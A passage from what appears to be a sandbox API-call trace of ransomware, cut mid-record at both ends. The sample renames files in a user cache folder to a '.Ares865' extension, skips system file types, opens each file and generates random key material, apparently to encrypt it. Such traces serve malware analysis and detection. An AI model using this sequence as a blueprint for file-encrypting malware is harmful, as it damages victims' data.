returned 1 [0110.619] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.619] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.620] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" | out: lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" [0110.620] lstrlenW (lpString="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 65 [0110.620] lstrlenW (lpString="Ares865") returned 7 [0110.620] lstrcmpiW (lpString1="ECF9450", lpString2="Ares865") returned 1 [0110.620] lstrlenW (lpString=".dll") returned 4 [0110.620] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2=".dll") returned 1 [0110.620] lstrlenW (lpString=".lnk") returned 4 [0110.620] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2=".lnk") returned 1 [0110.620] lstrlenW (lpString=".ini") returned 4 [0110.620] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2=".ini") returned 1 [0110.620] lstrlenW (lpString=".sys") returned 4 [0110.620] lstrcmpiW (lpString1="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", lpString2=".sys") returned 1 [0110.620] lstrlenW (lpString="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned 65 [0110.620] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.Ares865") returned 155 [0110.620] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450.ares865"), dwFlags=0x1) returned 1 [0110.622] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\a9e4f776657345b52012ce8e279d314c_183a5be0b233cc1d513955fabecf9450.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.622] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=471) returned 1 [0110.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.622] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.623] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.623] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.627] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.628] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.628] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.629] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" | out: lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" [0110.629] lstrlenW (lpString="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 65 [0110.629] lstrlenW (lpString="Ares865") returned 7 [0110.629] lstrcmpiW (lpString1="002D001", lpString2="Ares865") returned -1 [0110.629] lstrlenW (lpString=".dll") returned 4 [0110.629] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2=".dll") returned 1 [0110.629] lstrlenW (lpString=".lnk") returned 4 [0110.629] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2=".lnk") returned 1 [0110.629] lstrlenW (lpString=".ini") returned 4 [0110.629] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2=".ini") returned 1 [0110.629] lstrlenW (lpString=".sys") returned 4 [0110.629] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2=".sys") returned 1 [0110.629] lstrlenW (lpString="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 65 [0110.629] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.Ares865") returned 155 [0110.629] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001.ares865"), dwFlags=0x1) returned 1 [0110.631] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.631] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1518) returned 1 [0110.631] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.631] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.631] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.631] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.632] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.632] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.634] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.635] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.635] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.636] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" | out: lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" [0110.636] lstrlenW (lpString="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 65 [0110.636] lstrlenW (lpString="Ares865") returned 7 [0110.636] lstrcmpiW (lpString1="0275852", lpString2="Ares865") returned -1 [0110.636] lstrlenW (lpString=".dll") returned 4 [0110.636] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2=".dll") returned 1 [0110.636] lstrlenW (lpString=".lnk") returned 4 [0110.636] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2=".lnk") returned 1 [0110.636] lstrlenW (lpString=".ini") returned 4 [0110.636] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2=".ini") returned 1 [0110.636] lstrlenW (lpString=".sys") returned 4 [0110.636] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2=".sys") returned 1 [0110.636] lstrlenW (lpString="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 65 [0110.636] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.Ares865") returned 155 [0110.636] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852.ares865"), dwFlags=0x1) returned 1 [0110.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.638] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1618) returned 1 [0110.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.638] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.638] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.639] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.639] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.642] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.642] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.642] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.643] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" | out: lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" [0110.643] lstrlenW (lpString="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 65 [0110.643] lstrlenW (lpString="Ares865") returned 7 [0110.643] lstrcmpiW (lpString1="82C3EB8", lpString2="Ares865") returned -1 [0110.643] lstrlenW (lpString=".dll") returned 4 [0110.643] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2=".dll") returned 1 [0110.643] lstrlenW (lpString=".lnk") returned 4 [0110.643] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2=".lnk") returned 1 [0110.643] lstrlenW (lpString=".ini") returned 4 [0110.643] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2=".ini") returned 1 [0110.643] lstrlenW (lpString=".sys") returned 4 [0110.643] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2=".sys") returned 1 [0110.643] lstrlenW (lpString="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 65 [0110.643] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.Ares865") returned 155 [0110.643] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8.ares865"), dwFlags=0x1) returned 1 [0110.646] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.646] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1618) returned 1 [0110.646] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.646] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.646] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.646] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.647] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.647] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.650] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.650] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.650] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.651] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" | out: lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" [0110.651] lstrlenW (lpString="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 65 [0110.651] lstrlenW (lpString="Ares865") returned 7 [0110.651] lstrcmpiW (lpString1="E12F150", lpString2="Ares865") returned 1 [0110.651] lstrlenW (lpString=".dll") returned 4 [0110.651] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2=".dll") returned 1 [0110.651] lstrlenW (lpString=".lnk") returned 4 [0110.651] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2=".lnk") returned 1 [0110.651] lstrlenW (lpString=".ini") returned 4 [0110.651] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2=".ini") returned 1 [0110.651] lstrlenW (lpString=".sys") returned 4 [0110.651] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2=".sys") returned 1 [0110.651] lstrlenW (lpString="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 65 [0110.651] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.Ares865") returned 155 [0110.652] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150.ares865"), dwFlags=0x1) returned 1 [0110.653] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.653] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1517) returned 1 [0110.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.654] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.654] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.654] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.654] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.657] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.657] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.657] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.658] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" | out: lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" [0110.658] lstrlenW (lpString="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 65 [0110.658] lstrlenW (lpString="Ares865") returned 7 [0110.658] lstrcmpiW (lpString1="CD349FC", lpString2="Ares865") returned 1 [0110.658] lstrlenW (lpString=".dll") returned 4 [0110.658] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2=".dll") returned 1 [0110.658] lstrlenW (lpString=".lnk") returned 4 [0110.658] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2=".lnk") returned 1 [0110.658] lstrlenW (lpString=".ini") returned 4 [0110.658] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2=".ini") returned 1 [0110.658] lstrlenW (lpString=".sys") returned 4 [0110.658] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2=".sys") returned 1 [0110.658] lstrlenW (lpString="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 65 [0110.658] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.Ares865") returned 155 [0110.659] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc.ares865"), dwFlags=0x1) returned 1 [0110.660] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.660] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1517) returned 1 [0110.660] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.660] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.660] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.660] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.661] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.661] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.664] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) 